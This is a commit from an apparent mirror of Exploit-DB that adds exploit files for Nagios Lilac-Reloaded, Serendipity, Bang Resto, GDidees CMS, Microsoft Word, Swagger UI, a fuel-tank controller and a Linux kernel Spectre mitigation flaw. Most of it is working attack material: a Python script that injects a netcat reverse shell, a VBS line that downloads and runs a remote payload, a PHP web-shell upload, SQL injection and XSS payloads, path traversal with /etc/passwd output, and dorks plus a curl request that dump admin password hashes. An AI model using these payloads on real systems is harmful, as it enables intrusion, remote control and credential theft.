bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2023-04-21

Browse source 
18 changes to exploits/shellcodes/ghdb

Franklin Fueling Systems TS-550 - Default Password

Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information

Linux Kernel 6.2 -  Userspace Processes To Enable Mitigation

Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
Bang Resto v1.0 - 'Multiple' SQL Injection
Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)

Chitor-CMS v1.1.2 - Pre-Auth SQL Injection

GDidees CMS 3.9.1 - Local File Disclosure

Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)

Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)

ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)
Serendipity 2.4.0 - Cross-Site Scripting (XSS)
Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)

FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)

AspEmail v5.6.0.2 - Local Privilege Escalation

File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control
This commit is contained in:
Exploit-DB 2023-04-21 00:16:25 +00:00
parent 5e4b800b41
commit bd09027499
18 changed files with 1680 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

60
exploits/hardware/remote/51382.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: Franklin Fueling Systems TS-550 - Default Password
# Date: 4/16/2023
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)
# Version: TS-550
# Tested on: Linux/Android(termux)
Step 1 : attacker can using these dorks and access to find the panel
inurl:"relay_status.html"
inurl:"fms_compliance.html"
inurl:"fms_alarms.html"
inurl:"system_status.html"
inurl:"system_reports.html'
inurl:"tank_status.html"
inurl:"sensor_status.html"
inurl:"tank_control.html"
inurl:"fms_reports.html"
inurl:"correction_table.html"
Step 2 : attacker can send request
curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi
Step 3 : if get response that show like this
<TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION>
<DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/>
<ROLE_LIST>
<ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/>
<ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/>
<ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/>
</ROLE_LIST>
Step 4 : attacker can crack the hashesh using john the ripper
notice : most of the panels password is : admin
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

75
exploits/json/webapps/51379.txt Normal file
View file

@ -0,0 +1,75 @@
# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information
# Date: 14 April, 2023
# Exploit Author: Rafael Cintra Lopes
# Vendor Homepage: https://swagger.io/
# Version: < 4.1.3
# CVE: CVE-2018-25031
# Site: https://rafaelcintralopes.com.br/
# Usage: python swagger-exploit.py https://[swagger-page].com
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.service import Service
import time
import json
import sys
if __name__ == "__main__":
target = sys.argv[1]
desired_capabilities = DesiredCapabilities.CHROME
desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}
options = webdriver.ChromeOptions()
options.add_argument("--headless")
options.add_argument("--ignore-certificate-errors")
options.add_argument("--log-level=3")
options.add_experimental_option("excludeSwitches", ["enable-logging"])
# Browser webdriver path
drive_service = Service("C:/chromedriver.exe")
driver = webdriver.Chrome(service=drive_service,
options=options,
desired_capabilities=desired_capabilities)
driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")
time.sleep(10)
driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")
time.sleep(10)
logs = driver.get_log("performance")
with open("log_file.json", "w", encoding="utf-8") as f:
f.write("[")
for log in logs:
log_file = json.loads(log["message"])["message"]
if("Network.response" in log_file["method"]
or "Network.request" in log_file["method"]
or "Network.webSocket" in log_file["method"]):
f.write(json.dumps(log_file)+",")
f.write("{}]")
driver.quit()
json_file_path = "log_file.json"
with open(json_file_path, "r", encoding="utf-8") as f:
logs = json.loads(f.read())
for log in logs:
try:
url = log["params"]["request"]["url"]
if(url == "https://petstore.swagger.io/v2/hacked1.json"):
print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")
if(url == "https://petstore.swagger.io/v2/hacked2.json"):
print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")
except Exception as e:
pass

232
exploits/linux/local/51384.txt Normal file
View file

@ -0,0 +1,232 @@
## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation
## Exploit Author: nu11secur1ty
## CVE ID: CVE-2023-1998
## Description
## Summary
The Linux kernel allows userspace processes to enable mitigations by
calling prctl with
[PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html)
which disables the speculation feature as well as by using seccomp. We
had noticed that on VMs of at least one major cloud provider, the
kernel still left the victim process exposed to attacks in some cases
even after enabling the spectre-BTI mitigation with prctl. The same
beahaviour can be observed on a bare-metal machine when forcing the
mitigation to IBRS on boot comand line.
This happened because when plain IBRS was enabled (not enhanced IBRS),
the kernel had some logic that determined that
[STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html)
was not needed. The IBRS bit implicitly protects against cross-thread
branch target injection. However, with legacy
[IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html),
the IBRS bit was cleared on returning to userspace, due to performance
reasons, which disabled the implicit STIBP and left userspace threads
vulnerable to cross-thread branch target injection against which STIBP
protects.
## Severity
Medium - The kernel failed to protect applications that attempted to
protect against Spectre v2 leaving them open to attack from other
processes running on the same physical core in another hyperthread.
## Vulnerable code
The Bug present on Kernel 6.2
(https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196)
implements an optimization that disables STIBP if the mitgation is
IBRS or eIBRS. However IBRS doesn't mitigate SMT attacks on userspace
as eIBRS does. Setting spectre_v2=ibrs on kernel boot parameters for
bare metal machines without eIBRS support also triggers the bug.
```c
/*
* If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,
* STIBP is not required.
*/
if (!boot_cpu_has(X86_FEATURE_STIBP) ||
!smt_possible ||
spectre_v2_in_ibrs_mode(spectre_v2_enabled))
return;
```
## Proof of Concept
The test consists of two processes. The attacker constantly poisons an
indirect call to speculatively redirect it to a target address. The
victim process measures the mispredict rate and tries to mitigate the
attack either by calling PRCTL or writing to the MSR directly using a
kernel module that exposes MSR read and write operations to userspace.
```c
/*
gcc -o victim test.c -O0 -masm=intel -w -DVICTIM
gcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL
gcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM
-DMSR -DMSR_VAL=0
gcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1
gcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2
gcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR
-DMSR_VAL=0 -DIBPB
gcc -o attacker test.c -O0 -masm=intel -w
*/
#include "utils.h"
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>
#ifndef PRINT_AMMOUNT
#define PRINT_AMMOUNT 1000
#endif
#define IA32_SPEC_CTRL 72
uint8_t *rdiPtr;
uint8_t unused[0x500];
uint8_t probeArray[0x1000] = {2};
uint8_t unuse2[0x500];
uint32_t f1() {}
int poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu)
{
volatile uint8_t d;
unsigned tries = 0;
unsigned hits = 0;
unsigned totalHits = 0;
unsigned totalTries = 0;
jitForLoop(srcAddress);
while (1)
{
#ifndef VICTIM
callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
continue;
#else
#ifdef IBPB
wrmsr_on_cpu(73, cpu, 1);
#endif
for (int i = 0; i < 100; i++)
{
d = *dstAddress;
flush((uint8_t *)&rdiPtr);
callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
}
if (probe(&probeArray[0]) < THRESHOLD)
{
hits++;
totalHits++;
}
totalTries++;
if (++tries % PRINT_AMMOUNT == 0)
{
printf("Rate: %u/%u MSR[72]=%d\n", hits,
tries,rdmsr_on_cpu(IA32_SPEC_CTRL,cpu));
#ifdef MSR
wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
#endif
tries = 0;
hits = 0;
if (totalTries >= PRINT_AMMOUNT * 10)
{
break;
}
}
usleep(1);
#endif
}
printf("Total mispredict rate: %d/%d (%.2f %)\n", totalHits,
totalTries, (float)totalHits * 100 / (float)totalTries);
}
int main(int argc, char **argv)
{
uint64_t srcAddress;
uint64_t dstAddress;
uint64_t cpu;
if (argc < 4)
{
printf("Usage: %s <srcAddress> <dstAddress> <cpuCore> \n", argv[0]);
printf("Example: %s 0x55555554123 0x55555555345 1 \n", argv[0]);
return 0;
}
srcAddress = (uint64_t)strtoull(argv[1], NULL, 16);
dstAddress = (uint64_t)strtoull(argv[2], NULL, 16);
cpu = (uint64_t)strtoull(argv[3], NULL, 16);
SetCoreAffinity(cpu);
uint8_t *rwx1 = requestMem((uint8_t *)(srcAddress & (~0xfffULL)), 0x1000);
uint8_t *rwx2 = requestMem((uint8_t *)(dstAddress & (~0xfffULL)), 0x1000);
#ifdef PRCTL
if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH,
PR_SPEC_FORCE_DISABLE, 0, 0) != 0)
{
perror("prctl");
}
printf("PRCTL GET value 0x%x\n", prctl(PR_GET_SPECULATION_CTRL,
PR_SPEC_INDIRECT_BRANCH, 0, 0, 0));
#endif
#ifdef MSR
printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
printf("writing msr[%d]=%d on core %d \n", IA32_SPEC_CTRL, MSR_VAL, cpu);
printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif
// set up leak gadget into position
#ifdef VICTIM
rdiPtr = (uint8_t *)f1;
copyLeakGadget(dstAddress);
#else
rdiPtr = (uint8_t *)dstAddress;
copyRetGadget(dstAddress);
#endif
poison(srcAddress, dstAddress, cpu);
#ifdef MSR
printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL,
rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif
}
```
Timeline
**Date reported** to Cloud providers: 31/12/2022
**Date reported** to security@kernel.org: 20/02/2022
**Date fixed:** 10/03/2023
- [torvalds/linux@6921ed9](https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d)
- https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d
Date disclosed: 12/04/2023
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

58
exploits/multiple/remote/51376.txt Normal file
View file

@ -0,0 +1,58 @@
## Exploit Title: Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor: https://www.microsoft.com/
## Software:
https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
## Reference:
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-ID: CVE-2023-28311
## Description:
The attack itself is carried out locally by a user with authentication to
the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open a
specially crafted file from a website which could lead to a local attack on
the victim's computer. The attacker can trick the victim to open a
malicious web page by using a `Word` malicious file and he can steal
credentials, bank accounts information, sniffing and tracking all the
traffic of the victim without stopping - it depends on the scenario and etc.
STATUS: HIGH Vulnerability
[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim hit
the button of the exploit!
```vbs
Call Shell("cmd.exe /S /c" & "curl -s
http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
```
## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)
[href](
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)
## Proof and Exploit
[href](https://streamable.com/s60x3k)
## Time spend:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

99
exploits/php/webapps/51372.txt Normal file
View file

@ -0,0 +1,99 @@
Exploit Title: Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)
Application: Serendipity
Version: 2.4.0
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://docs.s9y.org/
Software Link: https://docs.s9y.org/downloads.html
Date of found: 13.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
If we load the poc.phar file in the image field while creating a category, we can run commands on the system.
<?php echo system("cat /etc/passwd"); ?>
I wrote a file with the above payload, a poc.phar extension, and uploaded it.
Visit to http://localhost/serendipity/uploads/poc.phar
poc request:
POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1
Host: localhost
Content-Length: 1561
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
Connection: close
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[token]"
ae9b8ae35a756c24f9552a021ee81d56
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[action]"
admin
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[adminModule]"
media
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[adminAction]"
add
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar"
Content-Type: application/octet-stream
<?php echo system("cat /etc/passwd");?>
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_filename][1]"
poc.phar
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_directory][1]"
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[column_count][1]"
true
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[imageurl]"
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[imageimporttype]"
image
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_filename][]"
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_directory][]"
------WebKitFormBoundaryZWKPiba66PSVGQzc--
poc video : https://youtu.be/_VrrKOTywgo

47
exploits/php/webapps/51373.txt Normal file
View file

@ -0,0 +1,47 @@
Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS)
Author: Mirabbas Ağalarov
Application: Serendipity
Version: 2.4.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://docs.s9y.org/
Software Link: https://docs.s9y.org/downloads.html
Date of found: 13.04.2023
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1.Anyone who has the authority to create the new entry can do this
payload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E
POST /serendipity/serendipity_admin.php? HTTP/1.1
Host: localhost
Content-Length: 730
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
Connection: close
serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1
2. visit the entry you created

68
exploits/php/webapps/51374.py Executable file
View file

@ -0,0 +1,68 @@
#!/usr/bin/env python
"""
# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2023-04-13
# Exploit Author: max / Zoltan Padanyi
# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit
# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download
# Version: 2.0.8
# Tested on: Debian 7.6
# CVE : N/A
The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;
Use at your own risk!
RCA - wild exec is ongoing without any filtering
in library/Net/Traceroute.php
181 function _setTraceroutePath($sysname)
182 {
183 $status = '';
184 $output = array();
185 $traceroute_path = '';
186
187 if ("windows" == $sysname) {
188 return "tracert";
189 } else {
190 $traceroute_path = exec("which traceroute", $output, $status);
[...]
257 function traceroute($host)
258 {
259
260 $argList = $this->_createArgList();
261 $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];
262 exec($cmd, $this->_result);
"""
import requests
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)
parser.add_argument("-i", "--ip", help="Listener IP", required=True)
parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)
args = parser.parse_args()
rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"
body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}
try:
r = requests.get(args.url)
if r.ok:
print("[+] URL looks good...moving forward...")
print("[+] Sending exploit in...")
r = requests.post(args.url,data=body)
if r.ok:
print("[+] Got HTTP 200, check your listener!")
else:
print("[-] Some kind of error happened, check the http response below!")
print(r.text)
except Exception as e:
print("General exception: " + str(e))

35
exploits/php/webapps/51377.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage:
https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link:
https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29848
*Steps to Reproduce:*
1. First login to your admin panel.
2. then go to Menu section and click add new menu from group.
your request data will be:
POST /bangresto/admin/menu.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/111.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/admin/menu.php
Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6
Connection: close
itemName=test&itemPrice=1&menuID=1&addItem=
3. Then use any XSS Payload in "itemName" parameter and click add.
4. You will see XSS pop up.

43
exploits/php/webapps/51378.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection
# Date: 2023-04-02
# Exploit Author: Rahad Chowdhury
# Vendor Homepage:
https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
# Software Link:
https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip
# Version: 1.0
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-29849
*Affected Parameters:*
btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],
itemqty[], btnMenuItemID
*Steps to Reproduce:*
1. First login your staff panel.
2. then go to "order" menu and Select menu then create order and intercept
request data using burp suite.
so your request data will be:
POST /bangresto/staff/displayitem.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 194
Origin: http://127.0.0.1
Referer: http://127.0.0.1/bangresto/staff/order.php
Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5
Connection: close
btnMenuItemID=1&qty=1
3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based
SQL Injection use this query ".1 union select
1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())--
-" in "btnMenuItemID" parameter.
4. Check browser you will see user, database and version informations.

76
exploits/php/webapps/51381.txt Normal file
View file

@ -0,0 +1,76 @@
# Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure
# Date : 03/27/2023
# Exploit Author : Hadi Mene
# Vendor Homepage : https://www.gdidees.eu/
# Software Link : https://www.gdidees.eu/cms-1-0.html
# Version : 3.9.1 and earlier
# Tested on : Debian 11
# CVE : CVE-2023-27179
### Summary:
GDidees CMS v3.9.1 and lower versions was discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.
### Description :
Imgdownload.php is mainly used by the QR code generation module to download an QR code.
The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized.
Furthermore, there is no admin session check in this code as it should since only the admin user should normally
be able to download QR code.
Vulnerable Code :
3. if (isset($_GET["filename"])) {
4. $filename=$_GET["filename"];
.....
.....
27. @readfile($filename) OR die();
### POC :
URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd
Exploitation using curl
# curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
